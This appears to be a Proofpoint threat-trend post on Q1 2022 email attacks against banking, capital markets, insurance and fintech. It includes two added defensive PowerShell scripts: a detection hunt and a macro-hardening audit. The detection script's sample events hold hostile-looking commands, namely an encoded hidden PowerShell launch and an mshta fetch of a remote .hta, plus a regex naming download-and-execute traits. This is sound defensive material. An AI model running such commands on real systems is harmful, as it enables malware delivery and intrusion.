As the Russia-Ukraine conflict continued to shape the threat landscape during the first quarter of 2022, chief information security officers (CISOs) pivoted to monitoring for indicators of state-aligned activity, particularly across the financial services sector. As attackers' objectives and methods evolved, cyber criminals leveraged business email compromise (BEC), access brokers and ransomware to inflict the most financial damage on organizations of all sizes and types. In 2021, adjusted losses from BEC alone were nearly $2.4 billion, according to the FBI's Internet Crime Complaint Center.
Extensive phishing campaigns, combined with multiple threats per day distributing commodity stealers, have highlighted the importance of stolen credentials to criminal ecosystems. For proactive CISOs, continuously assessing the threats targeting their employees and adapting security controls to reduce risk have become business-critical protection measures.
To better understand the threats that organizations in the financial services sector are facing, Proofpoint threat researchers analyzed Q1 2022 data targeting customers, looking for trends that can assist CISOs in understanding industry-specific threats.
In addition to analyzing the trends across the industry, the data was divided into four subsectors, using “breadbasket” sampling to understand the malicious messages targeting financial services. Our researchers took it a step further and performed a deeper dive into that small percentage of malicious messages that made it to users’ mailboxes. The results highlight the areas of residual risk CISOs should assess against their organizational controls.
Financial services threat trending: Q3 2021 through Q1 2022
For this period, the financial services threat data that Proofpoint researchers analyzed showed credential-phishing attacks that also capture multifactor authentication (MFA) tokens, not just passwords. These attacks had a strong showing in the financial sector in January 2022 and continued to build throughout Q1.
Social engineering continued to dwarf other attack methods from a volume perspective as threat actors remain focused on user interaction for threat delivery as the path of least resistance.
On the malware front, Emotet retained the lead in email volume throughout Q1, without much success in bypassing best-practice controls. Emotet, attributed to TA542, and other former banking Trojans such as TrickBot now operate as access brokers: their malicious URLs and attachments establish backdoor access that is then handed to other actors.
In Q1, Emotet shifted its tactics and techniques, focusing primarily on malicious documents and thread hijacking, as attackers diversify payloads and delivery mechanisms in their effort to bypass controls. The overarching trend was threat actors delivering malicious content that abuses command and script interpreters (MITRE ATT&CK T1059) to execute commands, scripts or binaries.
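The interpreter-abuse pattern above has a simple endpoint-side signature: an Office application spawning cmd, PowerShell, wscript, mshta or similar. The script below is an added example (not code from the Proofpoint post) that scores such events. Field names follow Sysmon Event ID 1 (ParentImage, Image, CommandLine); the interpreter list, the suspicious-argument regex and the sample events are assumptions constructed for the example, not a Proofpoint detection rule.

```powershell
# Added example: hunt for Office -> command/script interpreter process chains.
# Fields follow Sysmon Event ID 1; sample events below are constructed.

$OfficeParents = 'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'
$Interpreters  = 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe',
                 'cscript.exe', 'mshta.exe', 'regsvr32.exe', 'rundll32.exe'

# Command-line traits that raise the score (hidden window, encoded or downloaded
# payload). Assumed indicators for the example, not a vendor rule.
$SuspiciousArgs = '(?i)(-enc\b|encodedcommand|-w(indowstyle)?\s+hidden|downloadstring|downloadfile|\biex\b|invoke-expression|https?://)'

function Get-Leaf([string]$Path) { ($Path -split '[\\/]')[-1].ToLowerInvariant() }

function Find-OfficeSpawnedInterpreter {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][psobject]$Event)
    process {
        $parent = Get-Leaf $Event.ParentImage
        $child  = Get-Leaf $Event.Image
        if ($OfficeParents -notcontains $parent -or $Interpreters -notcontains $child) { return }

        $score = 1                                   # any Office -> interpreter is worth a look
        $hits  = @([regex]::Matches($Event.CommandLine, $SuspiciousArgs) | ForEach-Object { $_.Value })
        $score += $hits.Count                        # each suspicious trait adds one
        if ($parent -eq 'excel.exe') { $score += 1 } # Excel hosts the XLM (Excel 4.0) macro lures

        $severity = if ($score -ge 3) { 'High' } elseif ($score -ge 2) { 'Medium' } else { 'Low' }
        [pscustomobject]@{
            Time        = $Event.UtcTime
            User        = $Event.User
            Parent      = $parent
            Child       = $child
            Score       = $score
            Severity    = $severity
            Indicators  = ($hits -join ', ')
            CommandLine = $Event.CommandLine
        }
    }
}

# Constructed sample events (no real telemetry). Two should fire, two should not.
$SampleEvents = @(
    [pscustomobject]@{ UtcTime='2022-03-14 09:02:11'; User='CORP\jdoe';      ParentImage='C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE';   Image='C:\Windows\System32\cmd.exe';             CommandLine='cmd /c powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA' }
    [pscustomobject]@{ UtcTime='2022-03-14 09:05:40'; User='CORP\asmith';    ParentImage='C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; Image='C:\Windows\System32\mshta.exe';           CommandLine='mshta http://203.0.113.10/update.hta' }
    [pscustomobject]@{ UtcTime='2022-03-14 09:07:03'; User='CORP\asmith';    ParentImage='C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; Image='C:\Program Files\Adobe\Acrobat\Acrobat.exe'; CommandLine='"Acrobat.exe" report.pdf' }
    [pscustomobject]@{ UtcTime='2022-03-14 09:09:55'; User='CORP\svc-build'; ParentImage='C:\Windows\explorer.exe';                                      Image='C:\Windows\System32\cmd.exe';             CommandLine='cmd /c build.bat' }
)

$SampleEvents | Find-OfficeSpawnedInterpreter | Sort-Object Score -Descending |
    Format-Table Time, User, Parent, Child, Severity, Indicators -AutoSize
```

With the constructed events, the Excel-to-cmd chain scores High (hidden window, encoded command, Excel parent) and the Word-to-mshta chain scores Medium (remote URL); the Acrobat child and the explorer parent are filtered out. In production, feed the function from Get-WinEvent on the Microsoft-Windows-Sysmon/Operational log and tune the parent and interpreter lists to the Office and LOLBin inventory in your environment.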
In contrast, TA569, the actor behind the SocGholish framework, remained the most effective threat actor in financial services. Its approach is multistage: it impersonates browser and security updates on compromised websites, routes victims through a chain of redirects, and the resulting access frequently ends in ransomware.
A closer look at threats targeting financial services subsectors
Following is an overview of how attackers targeted the four financial services subsectors (banking, capital markets, insurance and fintech) during this period:
The good news is that threat volume doesn't always translate to success: the average click rate for social engineering-delivered messages declined in every financial services subsector except banking. Within banking, the average click rate on delivered messages surged to 11% in Q1, alongside a fivefold increase in the volume of Excel 4.0 (XLM) macro threats.
Some malware families were more successful at getting banking employees to click. Ursnif and Formbook saw the highest click rates, 17% and 15% respectively. That such a significant share of banking employees took the bait indicates a need for additional security awareness activity in a sector that normally excels in this area.
Qbot produced the highest number of total clicks in banking, followed by Emotet, with Tordal, JSSLoader and Ursnif rounding out the top five (by total clicks).
By technique, user engagement with messages leveraging process injection (MITRE ATT&CK T1055) in Q1 2022 was eight times greater than the total in Q2 2021.
Capital markets led all financial services subsectors in total clicks. Threat activity combining a cluster of three techniques (obfuscation, MITRE ATT&CK T1027; thread hijacking; and execution that requires user interaction, T1204) emerged in March 2022, and this trend resulted in capital markets dramatically outpacing the other subsectors in malicious messages delivered.
Attackers targeting the insurance industry were most effective at bypassing controls using malicious documents built with EtterSilent and the Tordal malware, and user click rates increased each month.
Campaigns using EtterSilent-built documents against the insurance sector provide good examples for security awareness training and phishing simulation programs.
Within insurance, Tordal produced the highest number of total clicks, and the cumulative volume of malicious messages delivered in Q1 was three times that of Q4 2021.
Fintech organizations were also targeted with EtterSilent, Qbot and Ursnif. These messages increased threefold between October and December 2021. Click rates on delivered messages averaged 3% in Q4 2021 and jumped to 11% in Q1 2022, with Qbot and Ursnif producing the highest click rates in the fintech sector.
Adaptive controls are essential for addressing residual risk
Today, CISOs in the financial services industry face unique challenges and must adapt their security strategies for the post-pandemic era. And, as the “2022 Voice of the CISO” report from Proofpoint makes clear, the accelerated adoption of hybrid work and the impact of the Great Resignation have made improving information protection the most pressing initiative for financial services CISOs.
With the added complexity of employees working from anywhere, adaptive controls are critical. Implementing layered security controls is a proven approach in all security domains, and adaptive controls also reduce alert fatigue while enabling the business.
For email threats, this means security awareness training for targeted users, automated removal of messages identified as malicious after delivery, browser and attachment isolation to contain threats, and disabling unneeded scripting components and macro use wherever possible to further reduce residual risk.
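The last of those controls is the one most organizations can apply today with policy alone. The script below is an added example (not code from the Proofpoint post or the Voice of the CISO report) that audits, and optionally applies, the Office macro and Windows Script Host restrictions on a single host. It assumes Office 2016/2019/Microsoft 365 Apps (the 16.0 registry hive) and writes the per-user Policies keys that Group Policy would otherwise set; the chosen target values and the function names are the example's own.

```powershell
# Added example: audit and optionally apply macro / script-interpreter hardening.
# Assumes Office 16.0 hive. On domain-managed hosts, deliver these values via GPO
# rather than running the Set- function directly.

$OfficeApps = 'Word', 'Excel', 'PowerPoint'

# VBAWarnings: 1 = enable all, 2 = disable with notification,
# 3 = disable except digitally signed, 4 = disable without notification.
# BlockContentExecutionFromInternet = 1 blocks macros in files carrying the
# Mark-of-the-Web (Internet zone) regardless of the VBAWarnings level.
$Desired = @{
    VBAWarnings                       = 3
    BlockContentExecutionFromInternet = 1
}

function Test-SettingCompliant([string]$Name, $Current) {
    if ($null -eq $Current) { return $false }                      # not set: Office falls back to the user's Trust Center choice
    if ($Name -eq 'VBAWarnings') { return [int]$Current -ge 3 }   # 4 is stricter than 3, so also compliant
    return [int]$Current -eq $Desired[$Name]
}

function Get-OfficeMacroPolicy {
    [CmdletBinding()]
    param([string[]]$Apps = $OfficeApps)
    foreach ($app in $Apps) {
        $key   = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
        $props = if (Test-Path $key) { Get-ItemProperty -Path $key } else { $null }
        foreach ($name in $Desired.Keys) {
            $current = $null
            if ($props -and $props.PSObject.Properties[$name]) { $current = $props.$name }
            [pscustomobject]@{
                App       = $app
                Setting   = $name
                Current   = $current
                Desired   = $Desired[$name]
                Compliant = Test-SettingCompliant $name $current
            }
        }
    }
}

function Get-WshPolicy {
    # Windows Script Host (wscript.exe / cscript.exe) is disabled when Enabled = 0.
    # An absent value means the default, which is enabled.
    foreach ($hive in 'HKLM', 'HKCU') {
        $key     = "${hive}:\SOFTWARE\Microsoft\Windows Script Host\Settings"
        $enabled = (Get-ItemProperty -Path $key -Name Enabled -ErrorAction SilentlyContinue).Enabled
        [pscustomobject]@{
            Hive      = $hive
            Enabled   = $enabled
            Compliant = ($null -ne $enabled -and [int]$enabled -eq 0)
        }
    }
}

function Set-OfficeMacroPolicy {
    [CmdletBinding(SupportsShouldProcess)]
    param([string[]]$Apps = $OfficeApps, [switch]$DisableWsh)
    foreach ($app in $Apps) {
        $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        foreach ($name in $Desired.Keys) {
            if ($PSCmdlet.ShouldProcess("$key\$name", "Set to $($Desired[$name])")) {
                Set-ItemProperty -Path $key -Name $name -Value $Desired[$name] -Type DWord
            }
        }
    }
    if ($DisableWsh) {
        # Machine-wide setting; requires an elevated session.
        $key = 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings'
        if ($PSCmdlet.ShouldProcess($key, 'Set Enabled = 0')) {
            Set-ItemProperty -Path $key -Name Enabled -Value 0 -Type DWord
        }
    }
}

Get-OfficeMacroPolicy | Format-Table -AutoSize
Get-WshPolicy | Format-Table -AutoSize
# Set-OfficeMacroPolicy -DisableWsh -WhatIf   # preview the changes, then drop -WhatIf to apply
```

Run the two Get- functions first; a Current value of blank means no policy is set and the user's own Trust Center choice is in effect, which is the weak state the click-rate figures above reflect. The Set- function supports -WhatIf so the change can be reviewed before it is written. Microsoft extended its macro notification policy to cover Excel 4.0 (XLM) macros in recent Office builds, which is what makes the XLM threats called out in the banking data controllable through the same VBAWarnings value; confirm which ADMX setting your build honours before relying on it, and disable WSH only after checking which legitimate logon or management scripts still depend on it.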
Download the “2022 Voice of the CISO” report from Proofpoint to learn more about how the CISO’s role is changing and how CISOs are coping with demands that are both increasing and evolving.
For the latest CISO news and resources, check out the Proofpoint CISO Hub.